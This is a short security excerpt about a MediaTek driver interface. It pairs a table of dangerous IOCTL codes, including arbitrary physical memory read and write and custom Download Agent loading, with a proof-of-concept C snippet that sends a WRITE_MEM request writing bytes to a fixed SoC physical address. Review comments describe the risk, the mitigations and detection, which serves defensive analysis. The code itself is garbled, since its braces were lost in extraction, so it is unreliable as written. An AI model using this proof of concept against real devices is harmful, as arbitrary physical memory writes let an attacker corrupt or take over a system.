| Command Class | IOCTL Code | Function | Danger Level |
|---------------|------------|----------|---------------|
| READ_MEM | 0xAAE0C | Arbitrary SoC physical memory read | High |
| WRITE_MEM | 0xAAE14 | Arbitrary SoC physical memory write | Critical |
| JUMP_ZERO | 0xAAE3A | Set program counter to 0x0 (BootROM reset) | Critical |
| DOWNLOAD_DA | 0xAAE5F | Load custom Download Agent into SRAM | Catastrophic |
/*
 * Proof-of-concept driver interaction: opens the MediaTek device interface
 * and issues a single WRITE_MEM request through DeviceIoControl.
 *
 * MTK_DEVICE, IOCTL_WRITE_MEM and WRITE_PAYLOAD are not defined in this
 * excerpt; IOCTL_WRITE_MEM presumably carries the 0xAAE14 code listed in the
 * table above -- verify against the header that defines it.
 *
 * Risk: the request's address field names a SoC physical address and the
 * driver applies no apparent range check (the table calls this an
 * "Arbitrary SoC physical memory write"), so any process that the device
 * object's ACL allows to open it with GENERIC_WRITE can modify memory the
 * OS relies on. The mitigation belongs in the driver, not in this caller:
 * restrict the device ACL to SYSTEM/administrators and validate the address
 * range in the IOCTL handler. For detection, opens of this device interface
 * and IOCTL 0xAAE14 from unexpected processes are the observable events.
 *
 * The braces of main(), of the block and of the struct initializer were lost
 * in extraction; the statement order below is the original's:
 *   - CreateFile: GENERIC_WRITE, no sharing, OPEN_EXISTING.
 *     NOTE(review): the handle is not compared with INVALID_HANDLE_VALUE and
 *     is never closed.
 *   - p: address 0x43E00000, data bytes 00 00 A0 E1 (the original comment
 *     calls this a NOP sled). The remaining 252 bytes of data[] are
 *     zero-filled by aggregate initialization, and sizeof(p) -- 260 bytes
 *     with the Windows DWORD/BYTE typedefs -- is passed as the input length,
 *     so the driver presumably receives the whole buffer; confirm in the
 *     handler how much of data[] is actually written.
 *   - DeviceIoControl: its return value and `returned` are not checked.
 * Returns 0 unconditionally.
 */
int main() HANDLE h = CreateFile(MTK_DEVICE, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); WRITE_PAYLOAD p = 0x43E00000, 0x00, 0x00, 0xA0, 0xE1 ; // NOP sled DWORD returned; DeviceIoControl(h, IOCTL_WRITE_MEM, &p, sizeof(p), NULL, 0, &returned, NULL); return 0;
/*
 * Input-buffer layout for the WRITE_MEM IOCTL (struct braces lost in
 * extraction; DWORD/BYTE are the Windows SDK typedefs):
 *   address - SoC physical address the driver writes to (per the table:
 *             "Arbitrary SoC physical memory write"); the layout itself
 *             imposes no bound on it.
 *   data    - up to 256 bytes copied to that address. There is no length
 *             field, so the driver presumably derives the byte count from
 *             the IOCTL input size -- verify in the handler, since a caller
 *             supplying a short buffer would otherwise cause an over-read.
 */
typedef struct DWORD address; BYTE data[256]; WRITE_PAYLOAD;